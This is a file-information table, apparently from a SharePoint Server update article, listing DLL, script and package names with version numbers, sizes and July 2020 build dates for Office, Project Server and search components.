\nas_xmlrwbin_dll_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| xmlrwbin.dll| | 224864| 5-Jul-20| 09:51 \nconversion.office.mso99lres.dll| mso99lres.dll| 16.0.10363.12107| 14548904| 7-Jul-20| 11:30 \nppt.conversion.mso99lres.dll| mso99lres.dll| 16.0.10363.12107| 14548904| | \nppt.edit.mso99lres.dll| mso99lres.dll| 16.0.10363.12107| 14548904| | \nwac.office.mso99lres.dll| mso99lres.dll| 16.0.10363.12107| 14548904| | \nconversion.office.mso20win32server.dll| mso20win32server.dll| 16.0.10363.12107| 4394912| 7-Jul-20| 11:30 \nmso.mso20win32server.dll| mso20win32server.dll| 16.0.10363.12107| 4394912| | \nppt.conversion.mso20win32server.dll| mso20win32server.dll| 16.0.10363.12107| 4394912| | \nppt.edit.mso20win32server.dll| mso20win32server.dll| 16.0.10363.12107| 4394912| | \nwac.office.mso20win32server.dll| mso20win32server.dll| 16.0.10363.12107| 4394912| | \nconversion.office.mso30win32server.dll| mso30win32server.dll| 16.0.10363.12107| 5585304| 7-Jul-20| 11:30 \nmso.mso30win32server.dll| mso30win32server.dll| 16.0.10363.12107| 5585304| | \nppt.conversion.mso30win32server.dll| mso30win32server.dll| 16.0.10363.12107| 5585304| | \nppt.edit.mso30win32server.dll| mso30win32server.dll| 16.0.10363.12107| 5585304| | \nwac.office.mso30win32server.dll| mso30win32server.dll| 16.0.10363.12107| 5585304| | \nconversion.office.mso40uiwin32server.dll| mso40uiwin32server.dll| 16.0.10363.12107| 12483488| 7-Jul-20| 11:30 \nppt.conversion.mso40uiwin32server.dll| mso40uiwin32server.dll| 16.0.10363.12107| 12483488| | \nppt.edit.mso40uiwin32server.dll| mso40uiwin32server.dll| 16.0.10363.12107| 12483488| | \nwac.office.mso40uiwin32server.dll| mso40uiwin32server.dll| 16.0.10363.12107| 12483488| | \nconversion.office.mso98win32server.dll| mso98win32server.dll| 16.0.10363.12107| 3950488| 7-Jul-20| 11:25 \nppt.conversion.mso98win32server.dll| mso98win32server.dll| 16.0.10363.12107| 3950488| | \nppt.edit.mso98win32server.dll| mso98win32server.dll| 16.0.10363.12107| 3950488| | \nwac.office.mso98win32server.dll| mso98win32server.dll| 16.0.10363.12107| 3950488| | \nconversion.office.msoserver.dll| msoserver.dll| 16.0.10363.12107| 14474648| 7-Jul-20| 11:25 \nppt.conversion.msoserver.dll| msoserver.dll| 16.0.10363.12107| 14474648| | \nppt.edit.msoserver.dll| msoserver.dll| 16.0.10363.12107| 14474648| | \nwac.office.msoserver.dll| msoserver.dll| 16.0.10363.12107| 14474648| | \nmicrosoft.office.web.common.dll| microsoft.office.web.common.dll| 16.0.10363.12107| 1973168| 7-Jul-20| 11:30 \nnl7data0011.dll_osssearch| nl7data0011.dll| 16.0.10363.12107| 7782880| 7-Jul-20| 11:30 \nnl7data0404.dll_osssearch| nl7data0404.dll| 16.0.10363.12107| 2708472| 7-Jul-20| 11:30 \nnl7data0804.dll_osssearch| nl7data0804.dll| 16.0.10363.12107| 3588096| 7-Jul-20| 11:30 \nconversion.oartodfserver.dll| oartodfserver.dll| 16.0.10363.12107| 3555736| 7-Jul-20| 11:30 \nppt.conversion.oartodfserver.dll| oartodfserver.dll| 16.0.10363.12107| 3555736| | \nppt.edit.oartodfserver.dll| oartodfserver.dll| 16.0.10363.12107| 3555736| | \nwac.office.oartodfserver.dll| oartodfserver.dll| 16.0.10363.12107| 3555736| | \nconversion.office.oartserver.dll| oartserver.dll| 16.0.10363.12107| 18202016| 7-Jul-20| 11:30 \nppt.conversion.oartserver.dll| oartserver.dll| 16.0.10363.12107| 18202016| | \nppt.edit.oartserver.dll| oartserver.dll| 16.0.10363.12107| 18202016| | \nwac.office.oartserver.dll| oartserver.dll| 16.0.10363.12107| 18202016| | \nmicrosoft.office.connectedservices.identity.dll| microsoft.office.connectedservices.identity.dll| 16.0.10363.12107| 62872| 7-Jul-20| 11:29 \nconversion.cultures.office.odf| office.odf| | 2224560| 7-Jul-20| 11:29 \noffice.odf| office.odf| | 2224560| 7-Jul-20| 11:29 \nppt.conversion.cultures.office.odf| office.odf| | 2224560| | \nvisioserver.cultures.office.odf| office.odf| | 2224560| 7-Jul-20| 11:29 \nwac.conversion.cultures.office.odf| office.odf| | 2224560| | \nwac.powerpoint.edit.bin.cultures.office.odf| office.odf| | 2224560| | \nxlsrv.ecs.culture.office.odf| office.odf| | 2224560| | \nxlsrv.ecs.office.odf| office.odf| | 2224560| | \nconversionhtmlutil.dll| htmlutil.dll| 16.0.10363.12107| 2854816| 7-Jul-20| 11:29 \nonetnative.dll| onetnative.dll| 16.0.10363.12107| 811960| 7-Jul-20| 11:29 \nonetnative_1.dll| onetnative.dll| 16.0.10363.12107| 811960| 7-Jul-20| 11:29 \nonetutil.dll| onetutil.dll| 16.0.10363.12107| 2866080| 7-Jul-20| 11:29 \nconversion.office.osfserver.dll| osfserver.dll| 16.0.10363.12107| 164264| 7-Jul-20| 11:25 \nwac.office.osfserver.dll| osfserver.dll| 16.0.10363.12107| 164264| | \nconversion.office.osfsharedserver.dll| osfsharedserver.dll| 16.0.10363.12107| 734112| 7-Jul-20| 11:25 \nwac.office.osfsharedserver.dll| osfsharedserver.dll| 16.0.10363.12107| 734112| | \nconversion.office.osfuiserver.dll| osfuiserver.dll| 16.0.10363.12107| 488360| 7-Jul-20| 11:25 \nwac.office.osfuiserver.dll| osfuiserver.dll| 16.0.10363.12107| 488360| | \nosfserver_activities_dll.x64| microsoft.sharepoint.workflowservices.activities.dll| 16.0.10363.12107| 286136| 7-Jul-20| 11:24 \nosfserver_workflow_dll| microsoft.sharepoint.workflowservices.dll| 16.0.10363.12107| 487880| 7-Jul-20| 11:24 \nosfextap.dll| microsoft.sharepoint.officeextension.applicationpages.dll| 16.0.10363.12107| 16320| 7-Jul-20| 11:24 \noffice_extension_manager_js| sp.officeextensionmanager.js| | 50999| 7-Jul-20| 11:25 \nmicrosoft.office.serviceinfrastructure.runtime.dll| microsoft.office.serviceinfrastructure.runtime.dll| 16.0.10363.12107| 1053136| 7-Jul-20| 11:30 \nosrvadml.xml| officeserveradminlinks.xml| | 3483| 5-Jul-20| 09:48 \nugcdot.xml| feature.xml| | 629| 5-Jul-20| 09:49 \nmicrosoft.office.server.directory.sharepoint| microsoft.office.server.directory.sharepoint.dll| 16.0.10363.12107| 747472| 7-Jul-20| 11:25 \nmicrosoft.office.server.dll| microsoft.office.server.dll| 16.0.10363.12107| 3042200| 7-Jul-20| 11:25 \nmicrosoft.office.server.dll_isapi| microsoft.office.server.dll| 16.0.10363.12107| 3042200| 7-Jul-20| 11:25 \nmicrosoft.office.server.openxml.dll| microsoft.office.server.openxml.dll| 16.0.10363.12107| 1658296| 7-Jul-20| 11:25 \nmicrosoft.office.server.userprofiles.dll| microsoft.office.server.userprofiles.dll| 16.0.10363.12107| 5326784| 7-Jul-20| 11:25 \nmicrosoft.office.server.userprofiles.dll_isapi| microsoft.office.server.userprofiles.dll| 16.0.10363.12107| 5326784| 7-Jul-20| 11:25 \nmicrosoft.sharepoint.taxonomy.dll| microsoft.sharepoint.taxonomy.dll| 16.0.10363.12107| 1744288| 7-Jul-20| 11:25 \nmicrosoft.sharepoint.taxonomy.dll_gac| microsoft.sharepoint.taxonomy.dll| 16.0.10363.12107| 1744288| 7-Jul-20| 11:25 \nmicrosoft.sharepoint.taxonomy.dll_gac1| microsoft.sharepoint.taxonomy.dll| 16.0.10363.12107| 1744288| 7-Jul-20| 11:25 \nmicrosoft.office.server.userprofiles.proxy.dll| microsoft.office.server.userprofiles.dll| 16.0.10363.12107| 1465800| 7-Jul-20| 11:25 \nscriptresources.rsx| scriptresources.resx| | 18203| 7-Jul-20| 11:25 \nscriptforwebtaggingui.js| scriptforwebtaggingui.js| | 132713| 5-Jul-20| 09:34 \nsp.ui.taxonomy.js| sp.ui.taxonomy.js| | 46397| 5-Jul-20| 09:35 \nmediaplayer.xap| mediaplayer.xap| | 38368| 7-Jul-20| 01:54 \ndecompositiontree.xap| decompositiontree.xap| | 108267| 7-Jul-20| 01:54 \naddgal.xap| addgallery.xap| | 407676| 7-Jul-20| 01:54 \nwpgalim.xap| webpartgalleryimages.xap| | 100639| 7-Jul-20| 01:54 \naddgallery.xap_silverlight| addgallery.xap| | 373928| 7-Jul-20| 01:54 \nmicrosoft.sharepoint.client.xap| microsoft.sharepoint.client.xap| | 312914| 7-Jul-20| 01:54 \ndsigres.cab.x64| dsigres.cab| | 229711| 7-Jul-20| 01:54 \ndsigres.cab.x64_10266| dsigres.cab| | 229711| 7-Jul-20| 01:54 \ndsigres.cab.x64_1033| dsigres.cab| | 229711| 7-Jul-20| 01:54 \ndsigres.cab.x64_1087| dsigres.cab| | 229711| 7-Jul-20| 01:54 \ndsigctrl.cab.x64| dsigctrl.cab| | 479611| 7-Jul-20| 01:54 \ndsigres.cab.x86| dsigres.cab| | 191355| 7-Jul-20| 01:55 \ndsigres.cab.x86_10266| dsigres.cab| | 191355| 7-Jul-20| 01:55 \ndsigres.cab.x86_1033| dsigres.cab| | 191355| 7-Jul-20| 01:55 \ndsigres.cab.x86_1087| dsigres.cab| | 191355| 7-Jul-20| 01:55 \ndsigctrl.cab.x86| dsigctrl.cab| | 526579| 7-Jul-20| 01:55 \nmossbi.wfe.gac.scorecards.client.dll| microsoft.performancepoint.scorecards.client.dll| 16.0.10363.12107| 2227168| 7-Jul-20| 11:25 \nmossbi.wfe.gac.scorecards.servercommon.dll| microsoft.performancepoint.scorecards.servercommon.dll| 16.0.10363.12107| 333824| 7-Jul-20| 11:25 \nppt.conversion.ppserver.dll| ppserver.dll| 16.0.10363.12107| 12353456| 7-Jul-20| 11:25 \nppt.edit.ppserver.dll| ppserver.dll| 16.0.10363.12107| 12353456| | \nmicrosoft.office.server.powerpoint.dll| microsoft.office.server.powerpoint.dll| 16.0.10363.12107| 108976| 7-Jul-20| 11:30 \npowerpointpowershell.format.ps1xml| powerpointpowershell.format.ps1xml| | 14378| 5-Jul-20| 09:50 \npjintl_1_new.dll| pjintl.dll| 16.0.10363.12107| 4898224| 7-Jul-20| 11:27 \nschedengine_new.exe| schedengine.exe| 16.0.10363.12107| 16456656| 7-Jul-20| 11:30 \nmicrosoft.projectserver.client.silverlight.dll| microsoft.projectserver.client.silverlight.dll| 16.0.10363.12107| 396184| 7-Jul-20| 11:29 \nmicrosoft.projectserver.client.phone.dll| microsoft.projectserver.client.phone.dll| 16.0.10363.12107| 396192| 7-Jul-20| 11:25 \ncontentdatabasecreate.sql| contentdatabasecreate.sql| | 8485872| 7-Jul-20| 11:26 \nmicrosoft.office.project.schema.dll| microsoft.office.project.schema.dll| 16.0.10363.12107| 6844312| 7-Jul-20| 11:30 \nmicrosoft.office.project.server.communications.dll| microsoft.office.project.server.communications.dll| 16.0.10363.12107| 371608| 7-Jul-20| 11:29 \nmicrosoft.office.project.server.communications.internal.dll| microsoft.office.project.server.communications.internal.dll| 16.0.10363.12107| 761248| 7-Jul-20| 11:30 \nmicrosoft.office.project.server.database.dll| microsoft.office.project.server.database.dll| 16.0.10363.12107| 10454936| 7-Jul-20| 11:29 \nmicrosoft.office.project.server.database.extension.dll| microsoft.office.project.server.database.extension.dll| 16.0.10363.12107| 4377512| 7-Jul-20| 11:29 \nmicrosoft.office.project.server.dll| microsoft.office.project.server.dll| 16.0.10363.12107| 9607064| 7-Jul-20| 11:30 \nmicrosoft.office.project.server.events.remote.dll| microsoft.office.project.server.events.remote.dll| 16.0.10363.12107| 59304| 7-Jul-20| 11:29 \nmicrosoft.office.project.server.inproc.dll| microsoft.office.project.server.inproc.dll| 16.0.10363.12107| 802216| 7-Jul-20| 11:29 \nmicrosoft.office.project.server.library.dll| microsoft.office.project.server.library.dll| 16.0.10363.12107| 1971624| 7-Jul-20| 11:30 \nsdk.microsoft.office.project.server.library.dll| microsoft.office.project.server.library.dll| 16.0.10363.12107| 1971624| 7-Jul-20| 11:30 \nmicrosoft.office.project.server.workflow.dll| microsoft.office.project.server.workflow.dll| 16.0.10363.12107| 196512| 7-Jul-20| 11:29 \nsdk.microsoft.office.project.server.workflow.dll| microsoft.office.project.server.workflow.dll| 16.0.10363.12107| 196512| 7-Jul-20| 11:29 \nmicrosoft.office.project.shared.dll| microsoft.office.project.shared.dll| 16.0.10363.12107| 1897384| 7-Jul-20| 11:30 \nsdk.microsoft.office.project.shared.dll| microsoft.office.project.shared.dll| 16.0.10363.12107| 1897384| 7-Jul-20| 11:30 \nmicrosoft.projectserver.client.dll| microsoft.projectserver.client.dll| 16.0.10363.12107| 396248| 7-Jul-20| 11:30 \nmicrosoft.projectserver.client.dll_001| microsoft.projectserver.client.dll| 16.0.10363.12107| 396248| 7-Jul-20| 11:30 \nmicrosoft.projectserver.dll| microsoft.projectserver.dll| 16.0.10363.12107| 888792| 7-Jul-20| 11:29 \nmicrosoft.projectserver.dll_001| microsoft.projectserver.dll| 16.0.10363.12107| 888792| 7-Jul-20| 11:29 \nmicrosoft.projectserver.serverproxy.dll| microsoft.projectserver.serverproxy.dll| 16.0.10363.12107| 1305056| 7-Jul-20| 11:29 \nps.csom.scriptclient.debug.js| ps.debug.js| | 1030292| 5-Jul-20| 09:35 \nps.csom.scriptclient.js| ps.js| | 623325| 5-Jul-20| 09:36 \nmicrosoft.office.project.server.pwa.applicationpages.dll| microsoft.office.project.server.pwa.applicationpages.dll| 16.0.10363.12107| 1051104| 7-Jul-20| 11:30 \nmicrosoft.office.project.server.pwa.dll| microsoft.office.project.server.pwa.dll| 16.0.10363.12107| 2758624| 7-Jul-20| 11:30 \nmicrosoft.office.project.server.administration.dll| microsoft.office.project.server.administration.dll| 16.0.10363.12107| 1002920| 7-Jul-20| 11:30 \npwa.admin.addmodifyuser.aspx| addmodifyuser.aspx| | 143704| 5-Jul-20| 09:48 \npwa.admin.editcustomfield.aspx| editcustomfield.aspx| | 153222| 5-Jul-20| 09:48 \npwa.admin.editlookuptable.aspx| editlookuptable.aspx| | 71493| 5-Jul-20| 09:48 \npwa.library.projectdrilldownsatellite.debug.js| projectdrilldownsatellite.debug.js| | 152603| 5-Jul-20| 09:48 \npwa.library.projectdrilldownsatellite.js| projectdrilldownsatellite.js| | 83340| 5-Jul-20| 09:48 \npwa.library.projectservertreepicker.debug.js| projectservertreepicker.debug.js| | 81985| 5-Jul-20| 09:35 \npwa.library.projectservertreepicker.js| projectservertreepicker.js| | 42509| 5-Jul-20| 09:34 \npwa.library.projectserverscripts.core.debug.js| ps.core.debug.js| | 373260| 5-Jul-20| 09:35 \npwa.library.projectserverscripts.core.js| ps.core.js| | 228332| 5-Jul-20| 09:35 \npwa.library.projectserverscripts.rm.debug.js| ps.resourcemanagers.debug.js| | 255143| 5-Jul-20| 09:35 \npwa.library.projectserverscripts.rm.js| ps.resourcemanagers.js| | 155142| 5-Jul-20| 09:35 \npwa.library.shell.debug.js| shell.debug.js| | 92012| 5-Jul-20| 09:35 \npwa.library.shell.js| shell.js| | 45380| 5-Jul-20| 09:35 \npwa.resx| pwa.resx| | 824177| 7-Jul-20| 11:26 \npwa.timesheet.timesheethistory.aspx| timesheethistory.aspx| | 4300| 5-Jul-20| 09:49 \nworkflowactivitiesdll| microsoft.office.project.server.workflowactivities.dll| 16.0.10363.12107| 55192| 7-Jul-20| 11:30 \nconversion.office.riched20.dll| riched20.dll| 16.0.10363.12107| 3242896| 7-Jul-20| 11:27 \nppt.conversion.riched20.dll| riched20.dll| 16.0.10363.12107| 3242896| | \nppt.edit.riched20.dll| riched20.dll| 16.0.10363.12107| 3242896| | \nwac.office.riched20.dll| riched20.dll| 16.0.10363.12107| 3242896| | \nxlsrv.ecs.riched20.dll| riched20.dll| 16.0.10363.12107| 3242896| | \nmicrosoft.eedict_companies.de.dll| microsoft.eedict_companies.de| 16.0.10363.12107| 18848| 7-Jul-20| 11:25 \nmicrosoft.eedict_companies.dll| microsoft.eedict_companies| 16.0.10363.12107| 109863848| 7-Jul-20| 11:25 \nmicrosoft.eedict_companies.en.dll| microsoft.eedict_companies.en| 16.0.10363.12107| 16816| 7-Jul-20| 11:25 \nmicrosoft.eedict_companies.es.dll| microsoft.eedict_companies.es| 16.0.10363.12107| 16808| 7-Jul-20| 11:25 \nmicrosoft.eedict_companies.fr.dll| microsoft.eedict_companies.fr| 16.0.10363.12107| 24992| 7-Jul-20| 11:25 \nmicrosoft.eedict_companies.it.dll| microsoft.eedict_companies.it| 16.0.10363.12107| 46504| 7-Jul-20| 11:25 \nmicrosoft.eedict_companies.ja.dll| microsoft.eedict_companies.ja| 16.0.10363.12107| 1533872| 7-Jul-20| 11:25 \nmicrosoft.eedict_companies.nl.dll| microsoft.eedict_companies.nl| 16.0.10363.12107| 18344| 7-Jul-20| 11:25 \nmicrosoft.eedict_companies.no.dll| microsoft.eedict_companies.no| 16.0.10363.12107| 2098096| 7-Jul-20| 11:25 \nmicrosoft.eedict_companies.pt.dll| microsoft.eedict_companies.pt| 16.0.10363.12107| 17840| 7-Jul-20| 11:25 \nmicrosoft.eedict_companies.ru.dll| microsoft.eedict_companies.ru| 16.0.10363.12107| 33214896| 7-Jul-20| 11:25 \nmicrosoft.eedict_companies_acceptor.ar.dll| microsoft.eedict_companies_acceptor.ar| 16.0.10363.12107| 9888160| 7-Jul-20| 11:25 \nmicrosoft.stopworddictionary.dll| microsoft.stopworddictionary.dll| 16.0.10363.12107| 32680| 7-Jul-20| 11:25 \nmicrosoft.system_dictionaries_spellcheck.dll| microsoft.system_dictionaries_spellcheck.dll| 16.0.10363.12107| 24632744| 7-Jul-20| 11:25 \nodffilt.dll.x64| odffilt.dll| 16.0.10363.12107| 1840064| 7-Jul-20| 11:30 \nofffiltx.dll.x64| offfiltx.dll| 16.0.10363.12107| 2115016| 7-Jul-20| 11:30 \nmicrosoft.ceres.common.utils.dllmsil| microsoft.ceres.common.utils.dll| 16.0.10363.12107| 322472| 7-Jul-20| 11:25 \nmicrosoft.ceres.contentengine.contentpush.dll| microsoft.ceres.contentengine.contentpush.dll| 16.0.10363.12107| 160160| 7-Jul-20| 11:25 \nmicrosoft.ceres.contentengine.nlpevaluators.dll| microsoft.ceres.contentengine.nlpevaluators.dll| 16.0.10363.12107| 251808| 7-Jul-20| 11:25 \nmicrosoft.ceres.contentengine.operators.mars.dll| microsoft.ceres.contentengine.operators.mars.dll| 16.0.10363.12107| 37280| 7-Jul-20| 11:30 \ndocumentformat.openxml.dllmsil2| documentformat.openxml.dll| 2.6.0.4| 5305360| | \nupdate_documentformat.openxml.dllmsil2| documentformat.openxml.dll| 2.6.0.4| 5305360| 5-Jul-20| 09:23 \nsystem.io.packaging.dllmsil| system.io.packaging.dll| 1.0.0.4| 121872| | \nupdate_system.io.packaging.dllmsil| system.io.packaging.dll| 1.0.0.4| 121872| 5-Jul-20| 09:23 \nmicrosoft.ceres.docparsing.formathandlers.pdf.dllmsil| microsoft.ceres.docparsing.formathandlers.pdf.dll| 16.0.10363.12107| 4217248| 7-Jul-20| 11:25 \nmicrosoft.ceres.interactionengine.processing.builtin.dll| microsoft.ceres.interactionengine.processing.builtin.dll| 16.0.10363.12107| 402856| 7-Jul-20| 11:25 \nmicrosoft.ceres.nlpbase.dictionaries.dll| microsoft.ceres.nlpbase.dictionaries.dll| 16.0.10363.12107| 138656| 7-Jul-20| 11:25 \nmanagedblingsigned.dll| managedblingsigned.dll| | 1862344| | \nupdate_managedblingsigned.dll| managedblingsigned.dll| | 1862344| 5-Jul-20| 09:42 \nmicrosoft.ceres.nlpbase.richfields.dll| microsoft.ceres.nlpbase.richfields.dll| 16.0.10363.12107| 97696| 7-Jul-20| 11:25 \nmicrosoft.sharepointsearchproviderflow.dll| microsoft.sharepointsearchproviderflow.dll| 16.0.10363.3000| 27064| 7-Jul-20| 11:26 \nsearchcore.clustering.indexclusteringmember.dll| microsoft.ceres.searchcore.clustering.indexclusteringmember.dll| 16.0.10363.12107| 62368| 7-Jul-20| 11:27 \nsearchcore.clustering.indexclustermanager.dll| microsoft.ceres.searchcore.clustering.indexclustermanager.dll| 16.0.10363.12107| 128416| 7-Jul-20| 11:26 \nmicrosoft.ceres.searchcore.indexstorage.dll| microsoft.ceres.searchcore.indexstorage.dll| 16.0.10363.12107| 30616| 7-Jul-20| 11:30 \nmicrosoft.ceres.searchcore.journalshipper.dll| microsoft.ceres.searchcore.journalshipper.dll| 16.0.10363.12107| 87472| 7-Jul-20| 11:25 \nmicrosoft.ceres.searchcore.query.marslookupcomponent.dll| microsoft.ceres.searchcore.query.marslookupcomponent.dll| 16.0.10363.12107| 583072| 7-Jul-20| 11:30 \nmicrosoft.ceres.searchcore.seeding.dll| microsoft.ceres.searchcore.seeding.dll| 16.0.10363.12107| 132512| 7-Jul-20| 11:29 \najaxtkid.js| ajaxtoolkit.debug.js| | 312267| 5-Jul-20| 09:51 \najaxtkit.js| ajaxtoolkit.js| | 132858| 5-Jul-20| 09:51 \nsrchccd.js| search.clientcontrols.debug.js| | 380631| 5-Jul-20| 09:32 \nsrchcc.js| search.clientcontrols.js| | 204222| 5-Jul-20| 09:32 \nsrchuicd.js| searchui.debug.js| | 116371| 5-Jul-20| 09:49 \nsrchuicc.js| searchui.js| | 50907| 5-Jul-20| 09:49 \nsrchquerypipeline.dll| microsoft.office.server.search.query.dll| 16.0.10363.12107| 1103784| 7-Jul-20| 11:30 \nossapp.dll| microsoft.office.server.search.applications.dll| 16.0.10363.12107| 454056| 7-Jul-20| 11:25 \nossapp.dll_0001| microsoft.office.server.search.applications.dll| 16.0.10363.12107| 454056| 7-Jul-20| 11:25 \nclkprdct.dll| microsoft.office.server.search.clickpredict.dll| 16.0.10363.12107| 202680| 7-Jul-20| 11:25 \nsearchom.dll| microsoft.office.server.search.dll| 16.0.10363.12107| 21185968| 7-Jul-20| 11:25 \nsearchom.dll_0001| microsoft.office.server.search.dll| 16.0.10363.12107| 21185968| 7-Jul-20| 11:25 \nossex.dll| microsoft.office.server.search.exchangeadapter.dll| 16.0.10363.12107| 107448| 7-Jul-20| 11:25 \nossex.dll_0001| microsoft.office.server.search.exchangeadapter.dll| 16.0.10363.12107| 107448| 7-Jul-20| 11:25 \nsrchomnt.dll| microsoft.office.server.search.native.dll| 16.0.10363.12107| 517544| 7-Jul-20| 11:25 \nsearchom.dll_0003| microsoft.sharepoint.search.dll| 16.0.10363.12107| 3881912| 7-Jul-20| 11:25 \nsearchom.dll_0005| microsoft.sharepoint.search.dll| 16.0.10363.12107| 3881912| 7-Jul-20| 11:25 \nsrchomnt.dll_1| microsoft.sharepoint.search.native.dll| 16.0.10363.12107| 485816| 7-Jul-20| 11:26 \nmsscpi.dll| msscpi.dll| 16.0.10363.12107| 359344| 7-Jul-20| 11:30 \nmssdmn.exe| mssdmn.exe| 16.0.10363.12107| 625592| 7-Jul-20| 11:30 \nmssearch.exe| mssearch.exe| 16.0.10363.12107| 292272| 7-Jul-20| 11:30 \nmsslad.dll| msslad.dll| 16.0.10363.12107| 205240| 7-Jul-20| 11:30 \nmssph.dll| mssph.dll| 16.0.10363.12107| 2204592| 7-Jul-20| 11:30 \nmssrch.dll| mssrch.dll| 16.0.10363.12107| 3266480| 7-Jul-20| 11:30 \nquery9x.dll_0001| query.dll| 16.0.10363.12107| 136120| 7-Jul-20| 11:30 \ntquery.dll| tquery.dll| 16.0.10363.12107| 760232| 7-Jul-20| 11:30 \nnoteswebservice.dll.oss.x86| noteswebservice.dll| 16.0.10363.12107| 740280| 7-Jul-20| 11:26 \ncontrol_defaultresult.html| control_searchresults.html| | 31867| 5-Jul-20| 09:50 \ncontrol_defaultresult.js| control_searchresults.js| | 33517| 5-Jul-20| 09:51 \nitem_excel.html| item_excel.html| | 2696| 5-Jul-20| 09:37 \nitem_excel.js| item_excel.js| | 4014| 5-Jul-20| 09:37 \nitem_powerpoint.html| item_powerpoint.html| | 3221| 5-Jul-20| 09:37 \nitem_powerpoint.js| item_powerpoint.js| | 4570| 5-Jul-20| 09:37 \nitem_word.html| item_word.html| | 2832| 5-Jul-20| 09:37 \nitem_word.js| item_word.js| | 4160| 5-Jul-20| 09:38 \nlstqr.apx| listqueryrules.aspx| | 16035| 5-Jul-20| 09:51 \nliqrs.apx| listqueryrules.aspx| | 19878| 5-Jul-20| 09:50 \nlistqrl.apx| listqueryrules.aspx| | 14885| 5-Jul-20| 09:48 \nsetup.exe| setup.exe| 16.0.10363.12107| 1972648| | \nsvrsetup.exe| setup.exe| 16.0.10363.12107| 1972648| 7-Jul-20| 11:30 \nsvrsetup.dll| svrsetup.dll| 16.0.10363.12107| 17132432| 7-Jul-20| 11:30 \nwsssetup.dll| wsssetup.dll| 16.0.10363.12107| 17131928| 7-Jul-20| 11:30 \nvisioserver.microsoft.office.graphics.shapebuilder.dll| microsoft.office.graphics.shapebuilder.dll| 16.0.10363.12107| 13134768| 7-Jul-20| 11:30 \nsptrns.dll| microsoft.sharepoint.translation.dll| 16.0.10363.12107| 1104808| 7-Jul-20| 11:25 \nmicrosoft.fileservices.v2.dll| microsoft.fileservices.v2.dll| 16.0.10363.12107| 981928| 7-Jul-20| 11:25 \nspdxap.dll| microsoft.sharepoint.appmonitoring.applicationpages.dll| 16.0.10363.12107| 65936| 7-Jul-20| 11:25 \nmicrosoft.sharepoint.flighting.dll| microsoft.sharepoint.flighting.dll| 16.0.10363.12107| 2285480| 7-Jul-20| 11:25 \nactxprjlchrd.js| activexwinprojlauncher.debug.js| | 2095| 7-Jul-20| 11:30 \nactxprjlchr.js| activexwinprojlauncher.js| | 985| 7-Jul-20| 11:29 \nbitreeview.js| bitreeview.js| | 12881| 7-Jul-20| 11:29 \ncontentfollowing.debug.js| contentfollowing.debug.js| | 123898| 7-Jul-20| 11:30 \ncontentfollowing.js| contentfollowing.js| | 54230| 7-Jul-20| 11:29 \nfollowedtags.debug.js| followedtags.debug.js| | 6347| 7-Jul-20| 11:30 \nfollowedtags.js| followedtags.js| | 2728| 7-Jul-20| 11:29 \nfollowingcommon.debug.js| followingcommon.debug.js| | 21971| 7-Jul-20| 11:29 \nfollowingcommon.js| followingcommon.js| | 9648| 7-Jul-20| 11:29 \ngroup.debug.js| group.debug.js| | 125958| 7-Jul-20| 11:29 \ngroup.js| group.js| | 75985| 7-Jul-20| 11:30 \nhashtagprofile.debug.js| hashtagprofile.debug.js| | 6184| 7-Jul-20| 11:29 \nhashtagprofile.js| hashtagprofile.js| | 3287| 7-Jul-20| 11:30 \nhierarchytreeview.js| hierarchytreeview.js| | 8801| 7-Jul-20| 11:30 \nhtmlmenu.js| htmlmenus.js| | 21159| 7-Jul-20| 11:29 \nkpilro.js| kpilro.js| | 3184| 7-Jul-20| 11:30 \nmrudocs.debug.js| mrudocs.debug.js| | 9192| 7-Jul-20| 11:29 \nmrudocs.js| mrudocs.js| | 5864| 7-Jul-20| 11:30 \nmydocs.debug.js| mydocs.debug.js| | 73509| 7-Jul-20| 11:29 \nmydocs.js| mydocs.js| | 34455| 7-Jul-20| 11:29 \nmylinks.debug.js| mylinks.debug.js| | 7003| 7-Jul-20| 11:29 \nmylinks.js| mylinks.js| | 2631| 7-Jul-20| 11:30 \nmysiterecommendationsdebug.js| mysiterecommendations.debug.js| | 74489| 7-Jul-20| 11:30 \nmysiterecommendations.js| mysiterecommendations.js| | 41312| 7-Jul-20| 11:29 \nnotificationpanel.debug.js| notificationpanel.debug.js| | 14102| 7-Jul-20| 11:29 \nnotificationpanel.js| notificationpanel.js| | 7019| 7-Jul-20| 11:29 \nportal.debug.js| portal.debug.js| | 94787| 7-Jul-20| 11:29 \nportal.js| portal.js| | 52466| 7-Jul-20| 11:30 \nprbrows.debug.js| profilebrowsercontrol.debug.js| | 52762| 7-Jul-20| 11:29 \nprbrows.js| profilebrowsercontrol.js| | 28064| 7-Jul-20| 11:29 \nprojectsummary.debug.js| projectsummary.debug.js| | 36524| 7-Jul-20| 11:29 \nprojectsummary.js| projectsummary.js| | 13120| 7-Jul-20| 11:30 \nratings.js| ratings.js| | 18207| 7-Jul-20| 11:30 \nreputation.debug.js| reputation.debug.js| | 5317| 7-Jul-20| 11:29 \nreputation.js| reputation.js| | 3430| 7-Jul-20| 11:29 \nsoccom.js| socialcomment.js| | 23528| 7-Jul-20| 11:29 \nsocdata.js| socialdata.js| | 14891| 7-Jul-20| 11:30 \nsoctag.js| socialtag.js| | 9994| 7-Jul-20| 11:30 \nsprecdocsd.js| sp.recentdocs.debug.js| | 40634| 7-Jul-20| 11:29 \nsprecdocs.js| sp.recentdocs.js| | 18262| 7-Jul-20| 11:29 \nannouncementtilesdebug.js| sp.ui.announcementtiles.debug.js| | 14781| 7-Jul-20| 11:29 \nannouncementtiles.js| sp.ui.announcementtiles.js| | 8784| 7-Jul-20| 11:30 \nspui_cold.js| sp.ui.collabmailbox.debug.js| | 11768| 7-Jul-20| 11:30 \nspui_col.js| sp.ui.collabmailbox.js| | 7594| 7-Jul-20| 11:29 \ncommunities.js| sp.ui.communities.js| | 43982| 7-Jul-20| 11:29 \ncommunitiestileview.js| sp.ui.communities.tileview.js| | 8540| 7-Jul-20| 11:29 \ncommunityfeed.js| sp.ui.communityfeed.js| | 9999| 7-Jul-20| 11:29 \ncommunitymoderation.js| sp.ui.communitymoderation.js| | 8225| 7-Jul-20| 11:30 \nsp.ui.documentssharedbyme.debug.js| sp.ui.documentssharedbyme.debug.js| | 3174| 7-Jul-20| 11:30 \nsp.ui.documentssharedbyme.js| sp.ui.documentssharedbyme.js| | 2212| 7-Jul-20| 11:29 \nsp.ui.documentssharedwithme.debug.js| sp.ui.documentssharedwithme.debug.js| | 41725| 7-Jul-20| 11:29 \nsp.ui.documentssharedwithme.js| sp.ui.documentssharedwithme.js| | 24712| 7-Jul-20| 11:29 